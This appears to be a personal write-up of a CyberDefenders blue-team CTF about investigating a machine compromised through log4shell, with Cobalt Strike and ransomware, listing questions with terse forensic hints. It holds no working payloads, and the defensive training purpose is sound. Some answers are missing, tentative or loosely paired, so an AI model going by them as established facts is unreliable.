CyberDefenders.org, hosted a fun 48-hr CTF (permitting time for more players), all about responding to an incident where a box had been attacked, compromised using the latest log4j exploit and subsequently had malware and ransomeware insstalled. You are provided with a forensic image, and have to answer a series of forensic and IR questions.
For those that don’t know about CyberDefenders they host a platform deticated to training BlueTeam skills: Incident response, digital forensics, security analysts, etc). If you are used to VulnHub and Hack-the-box, these services are typically geared more towards redteaming and penetration testing. This is where CyberDefenders stand out!
1 What is the computer hostname?
2 What is the Timezone of the compromised machine?
- Currentcontrolset\control\timezoneinformation - PST
3 What is the current build number on the system?
- export explorer.exe
- right-click properties, details tab
4 What is the computer IP?
5 What is the domain computer was assigned to?
6 When was myoussef user created?
- event id: 4720
- scrape user creation from Registry - SAM Hive
- from the SAM registry 61006e00 = 2021-07-27 20:35:12 UTC
2021-12-28 06:57:23 UTC
7 What is the user mhasan password hint?
- Registry - SAM Hive
8 What is the version of the VMware product installed on the machine?
- Registry - Software Hive
9 What is the version of the log4j library used by the installed VMware product?
10 What is the log4j library log level specified in the configuration file?
11 The attacker exploited log4shell through an HTTP login request. What is the HTTP header used to inject payload?
not sure about this one, surely the header is x-forwarded-for
12 The attacker used the log4shell.huntress.com payload to detect if vcenter instance is vulnerable. What is the first link of the log4huntress payload?
13 When was the first successful login to vsphere WebClient?
28/12/2021 20:39:29 UTC
14 What is the attacker’s IP address?
powershell logs - reverse payload
15 What is the port the attacker used to receive the cobalt strike reverse shell?
- Powershell event logs
- Administrator PS ReadLine history
- mandiant’s speakeasy
16 What is the script name published by VMware to mitigate log4shell vulnerability?
17 In some cases, you may not be able to update the products used in your network. What is the system property needed to set to ‘true’ to work around the log4shell vulnerability?
18 What is the log4j version which contains a patch to CVE-2021-44228?
- Google Fu
19 Removing JNDIlookup.class may help in mitigating log4shell. What is the sha256 hash of the JNDILookup.class?
20 Analyze JNDILookup.class. What is the value stored in the CONTAINER_JNDI_RESOURCE_PATH_PREFIX variable?
21 To gain some persistence the attacker dropped a malicious exe file. What is the malicious executable name?
- Run keys
- User Hive
22 When was the first submission of ransomware to virustotal?
23 The ransomware downloads a text file from an external server. What is the key used to decrypt the URL?
- use ilspy to RE the .NET malware
24 What is the ISP that owns that IP that serves the text file?
- whois 126.96.36.199
25 The ransomware check for extensions to exclude them from the encryption process. What is the second extension the ransomware checks for?
- Use ilspy
- 67 1d 2f 2e ^ ItAGEocK
- FTK Imager
- Mandiant’s Speakeasy
- JAD (Java Decompiler)